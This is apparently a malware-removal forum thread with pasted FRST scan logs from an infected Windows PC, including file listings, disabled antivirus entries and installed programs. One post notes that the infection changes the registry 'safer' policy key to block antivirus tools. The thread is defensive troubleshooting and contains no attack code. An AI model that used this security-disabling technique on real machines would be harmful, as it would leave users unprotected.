2014-08-22 16:12 - 2014-08-23 16:20 - 00038790 _____ () C:\Windows\PFRO.log
2014-08-22 15:52 - 2014-08-23 16:16 - 00000000 ____D () C:\Qoobox
2014-08-22 14:32 - 2014-08-22 15:42 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy.BackupBySpybotPortable
2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps
2014-08-22 14:00 - 2014-08-23 16:48 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-08-22 13:41 - 2014-08-22 13:54 - 00000000 ____D () C:\Windows\dwrcs
2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development
2014-08-22 13:25 - 2014-08-23 11:16 - 00000782 _____ () C:\Windows\setupact.log
2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log
2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll
2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat
2014-08-20 18:12 - 2014-08-19 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy
2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft
2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe
2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe
2014-08-16 17:57 - 2014-08-17 17:23 - 00000000 ____D () C:\ProgramData\AVG2014
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg2014
2014-08-16 17:04 - 2014-08-16 17:05 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe
2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc
2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers
2014-08-15 20:57 - 2014-08-16 12:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc
2014-08-15 20:56 - 2014-08-16 09:22 - 00000000 ____D () C:\Program Files\DriverUpdate
2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers
2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe
2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe
2014-08-15 13:12 - 2014-08-15 13:13 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe
2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe
2014-08-15 13:04 - 2014-08-15 13:21 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer
2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe
2014-08-15 11:12 - 2014-08-15 11:13 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe
2014-08-15 11:11 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe
2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled
2014-08-14 18:20 - 2014-08-23 16:22 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job
2014-08-14 18:20 - 2014-08-20 23:44 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk
2014-08-14 18:20 - 2014-08-20 23:44 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk
2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys
2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5
2014-08-14 18:19 - 2014-08-23 11:16 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag
2014-08-14 18:19 - 2014-08-22 13:27 - 00000000 ____D () C:\Program Files\Glary Utilities 5
2014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft
2014-08-14 18:19 - 2014-08-04 03:06 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe
2014-08-14 18:19 - 2014-07-18 03:11 - 00016064 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\BootDefragDriver.sys
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe
2014-08-14 18:15 - 2014-08-14 18:16 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe
2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe
2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe
2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe
2014-08-14 17:37 - 2014-08-14 17:40 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe
2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-08-13 21:28 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod
2014-08-13 20:51 - 2014-08-13 20:52 - 00000000 ____D () C:\Program Files\QuickTime
2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk
2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch
2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a495
2014-08-12 18:02 - 2014-08-22 16:10 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a495
2014-08-12 17:58 - 2014-08-15 03:47 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir
2014-08-12 16:53 - 2014-08-22 21:40 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu
2014-08-12 16:51 - 2014-08-12 16:51 - 00000000 ____D () C:\ProgramData\IrfuqApivh

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-08-23 16:54 - 2014-08-23 16:54 - 00000000 ____D () C:\FRST
2014-08-23 16:54 - 2014-07-18 00:39 - 01159804 _____ () C:\Windows\WindowsUpdate.log
2014-08-23 16:48 - 2014-08-22 14:00 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-08-23 16:30 - 2014-08-23 16:30 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-23 16:30 - 2014-08-23 16:30 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-23 16:30 - 2014-08-23 16:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-23 16:30 - 2014-08-23 16:30 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-08-23 16:30 - 2011-03-14 18:46 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-08-23 16:27 - 2006-11-02 06:33 - 00694332 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-08-23 16:22 - 2014-08-14 18:20 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job
2014-08-23 16:21 - 2008-08-06 12:35 - 00000276 _____ () C:\Windows\Tasks\RtlNICDiagVistaStart.job
2014-08-23 16:21 - 2006-11-02 09:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-08-23 16:21 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-08-23 16:21 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-08-23 16:20 - 2014-08-22 16:12 - 00038790 _____ () C:\Windows\PFRO.log
2014-08-23 16:16 - 2014-08-23 16:16 - 00009460 _____ () C:\ComboFix.txt
2014-08-23 16:16 - 2014-08-22 15:52 - 00000000 ____D () C:\Qoobox
2014-08-23 16:13 - 2006-11-02 06:23 - 00000215 _____ () C:\Windows\system.ini
2014-08-23 14:48 - 2006-11-02 09:01 - 00032640 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-08-23 14:45 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\schemas
2014-08-23 14:32 -
2011-03-14 18:43 - 00000000 ____D () C:\Windows\pss2014-08-23 14:22 - 2006-11-02 07:18 - 00000000 ___RD () C:\Users\Public2014-08-23 14:20 - 2011-12-29 11:34 - 00000000 ____D () C:\Windows\ERDNT2014-08-23 14:09 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis2014-08-23 14:09 - 2011-02-10 21:08 - 00000000 ____D () C:\Users\Rita2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt2014-08-23 11:53 - 2014-08-23 11:51 - 00000000 ____D () C:\AdwCleaner2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT2014-08-23 11:25 - 2014-08-23 11:23 - 00001106 _____ () C:\Users\savas.kyriakidis\Desktop\Live PC Help.lnk2014-08-23 11:16 - 2014-08-22 13:25 - 00000782 _____ () C:\Windows\setupact.log2014-08-23 11:16 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag2014-08-23 11:05 - 2014-08-23 11:02 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy2014-08-22 21:40 - 2014-08-22 17:05 - 00000000 ____D () C:\VIPRERESCUE2014-08-22 21:40 - 2014-08-12 16:53 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu2014-08-22 17:13 - 2012-05-16 21:52 - 00000000 ____D () C:\temp2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK2014-08-22 16:10 - 2014-08-12 18:02 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a4952014-08-22 15:42 - 2014-08-22 14:32 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy.BackupBySpybotPortable2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps2014-08-22 14:15 - 2011-12-22 20:05 - 00000000 ____D () C:\ProgramData\AVAST Software2014-08-22 13:54 - 2014-08-22 13:41 - 00000000 ____D () C:\Windows\dwrcs2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 
____D () C:\ProgramData\DameWare Development2014-08-22 13:27 - 2014-08-14 18:19 - 00000000 ____D () C:\Program Files\Glary Utilities 52014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log2014-08-21 22:25 - 2011-12-22 18:52 - 00000680 _____ () C:\Users\savas.kyriakidis\AppData\Local\d3d9caps.dat2014-08-21 00:06 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Google2014-08-20 23:44 - 2014-08-14 18:20 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk2014-08-20 23:44 - 2014-08-14 18:20 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk2014-08-20 23:39 - 2008-08-06 12:41 - 00000000 ____D () C:\Program Files\Google2014-08-20 20:00 - 2009-06-10 23:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexmark Z700-P700 Series2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft2014-08-19 18:12 - 2014-08-20 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys2014-08-17 17:23 - 2014-08-16 17:57 - 00000000 ____D () C:\ProgramData\AVG20142014-08-17 17:23 - 2011-07-10 20:09 - 00000000 ____D () C:\$AVG2014-08-17 16:31 - 2011-07-10 19:21 - 00000000 ____D () C:\ProgramData\MFAData2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe2014-08-16 18:01 - 2011-07-10 19:25 - 00000000 ____D () C:\Program Files\AVG2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () 
C:\Users\savas.kyriakidis\AppData\Local\MFAData2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg20142014-08-16 17:05 - 2014-08-16 17:04 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc2014-08-16 12:05 - 2014-08-15 20:57 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers2014-08-16 10:06 - 2012-10-02 18:32 - 00000000 ____D () C:\Program Files\HTC2014-08-16 09:27 - 2008-08-06 12:49 - 00000000 ____D () C:\Program Files\Citrix2014-08-16 09:22 - 2014-08-15 20:56 - 00000000 ____D () C:\Program Files\DriverUpdate2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers2014-08-15 20:41 - 2012-10-02 18:45 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Htc2014-08-15 19:55 - 2008-08-06 12:37 - 00000000 ____D () C:\Program Files\Microsoft Office2014-08-15 19:54 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\system2014-08-15 17:56 - 2006-11-02 08:47 - 00267048 _____ () C:\Windows\system32\FNTCACHE.DAT2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe2014-08-15 13:26 - 2011-06-17 17:39 - 00058896 _____ () C:\Windows\system32\GDIPFONTCACHEV1.DAT2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe2014-08-15 13:21 - 2014-08-15 13:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer2014-08-15 13:13 - 2014-08-15 13:12 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) 
C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe2014-08-15 13:01 - 2012-01-24 17:09 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\LogMeIn Rescue Applet2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe2014-08-15 11:13 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe2014-08-15 11:12 - 2014-08-15 11:11 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe2014-08-15 03:47 - 2014-08-12 17:58 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 52014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe2014-08-14 18:16 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe2014-08-14 18:13 
- 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe2014-08-14 17:40 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe2014-08-13 23:07 - 2013-06-10 19:17 - 00002463 _____ () C:\Users\Public\Desktop\Transporter.lnk2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes2014-08-13 21:31 - 2014-08-13 21:28 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E12014-08-13 21:31 - 2011-12-24 11:26 - 00000000 ____D () C:\Program Files\iTunes2014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod2014-08-13 21:28 - 2008-09-02 12:28 - 00000000 ____D () C:\Program Files\Common Files\Apple2014-08-13 21:02 - 2008-09-02 12:28 - 00000000 ____D () C:\ProgramData\Apple2014-08-13 20:52 - 2014-08-13 20:51 - 00000000 ____D () C:\Program Files\QuickTime2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime2014-08-13 20:41 - 2013-04-22 21:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud2014-08-13 20:18 - 2008-08-06 12:41 - 00000000 ____D () C:\ProgramData\Google2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a4952014-08-12 17:13 - 2011-08-28 07:57 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\ALL 
Folders
2014-08-12 17:09 - 2011-08-28 08:01 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\Desk Top Stuff
2014-08-12 16:51 - 2014-08-12 16:51 - 00000000 ____D () C:\ProgramData\IrfuqApivh
2014-08-04 03:06 - 2014-08-14 18:19 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-08-23 16:28

==================== End Of Log ============================
jjoyner1985 Posted August 23, 2014 Author ID:870469

Forgot to mention that this infection also edits the safer key in the registry to disable the anti-viral programs on the computer. Removing the safer\codeidentifiers\0\path part of the key allows those programs to run until the block is put back in place a few minutes later.

Addition.txt

Additional scan result of Farbar Recovery Scan Tool (x86) Version:23-08-2014
Ran by savas.kyriakidis at 2014-08-23 16:55:17
Running from F:\
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Disabled - Up to date) {108DAC43-C256-20B7-BB05-914135DA5160}
AV: AVG Internet Security 2011 (Disabled - Up to date) {5A2746B1-DEE9-F85A-FBCD-ADB11639C5F0}
AS: AVG Internet Security 2011 (Disabled - Up to date) {E146A755-F8D3-F7D4-C17D-96C36DBE8F4D}
AS: Microsoft Security Essentials (Disabled - Up to date) {ABEC4DA7-E46C-2F39-81B5-AA334E5D1BDD}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: AVG Firewall (Disabled) {621CC794-9486-F902-D092-0484E8EA828B}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Update for Microsoft Office 2007 (KB2508958) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version: - Microsoft)32 Bit HP CIO Components Installer (Version: 3.1.1 - Hewlett-Packard) Hidden6500_E709_eDocs (Version: 1.00.0000 - Hewlett-Packard) Hidden6500_E709_Help (Version: 1.00.0000 - Hewlett-Packard) Hidden6500_E709a (Version: 50.0.165.000 - Hewlett-Packard) HiddenAcrobat.com (HKLM\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 2.0.0.0 - Adobe Systems Incorporated)Acrobat.com (Version: 2.0.0 - Adobe Systems Incorporated) HiddenActivClient CAC x86 (HKLM\...\{1BE8806A-84F8-4655-A381-0D5524430944}) (Version: 6.2 - ActivIdentity)Adobe AIR (HKLM\...\Adobe AIR) (Version: 3.2.0.2070 - Adobe Systems Incorporated)Adobe AIR (Version: 3.2.0.2070 - Adobe Systems Incorporated) HiddenAdobe Flash Player 11 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 11.0.1.152 - Adobe Systems Incorporated)Adobe Reader X (10.1.2) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.2 - Adobe Systems Incorporated)Akamai NetSession Interface (HKCU\...\Akamai) (Version: - Akamai Technologies, Inc)Any Video Converter 3.0.1 (HKLM\...\Any Video Converter_is1) (Version: - Any-Video-Converter.com)Apple Application Support (HKLM\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)Apple Mobile Device Support (HKLM\...\{941B4CE7-3F5D-443E-A8B7-56A420D2EAFD}) (Version: 7.1.2.6 - Apple Inc.)Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)ATI Catalyst Control Center (HKLM\...\{055EE59D-217B-43A7-ABFF-507B966405D8}) (Version: 2.007.0731.2233 - )AVG 2011 (HKLM\...\AVG) (Version: 10.0.1416 - AVG Technologies)AVG 2011 (Version: 10.0.1388 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.1390 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.1391 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.1392 - AVG Technologies) HiddenAVG 
2011 (Version: 10.0.1410 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.1416 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.2109 - AVG Technologies) HiddenBonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)bpd_scan (Version: 3.00.0000 - Hewlett-Packard) HiddenBPDSoftware (Version: 50.0.165.000 - Hewlett-Packard) HiddenBPDSoftware_Ini (Version: 1.00.0000 - Hewlett-Packard) HiddenBrowser Address Error Redirector (HKLM\...\{62230596-37E5-4618-A329-0D21F529A86F}) (Version: 1.00.0000 - Dell)BufferChm (Version: 120.0.194.000 - Hewlett-Packard) HiddenCatalyst Control Center Core Implementation (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Graphics Full Existing (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Graphics Full New (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Graphics Light (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Graphics Previews Common (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Graphics Previews Vista (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Chinese Standard (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Chinese Traditional (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization French (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization German (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Hungarian (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Italian (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Japanese (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Korean (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Polish (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Portuguese 
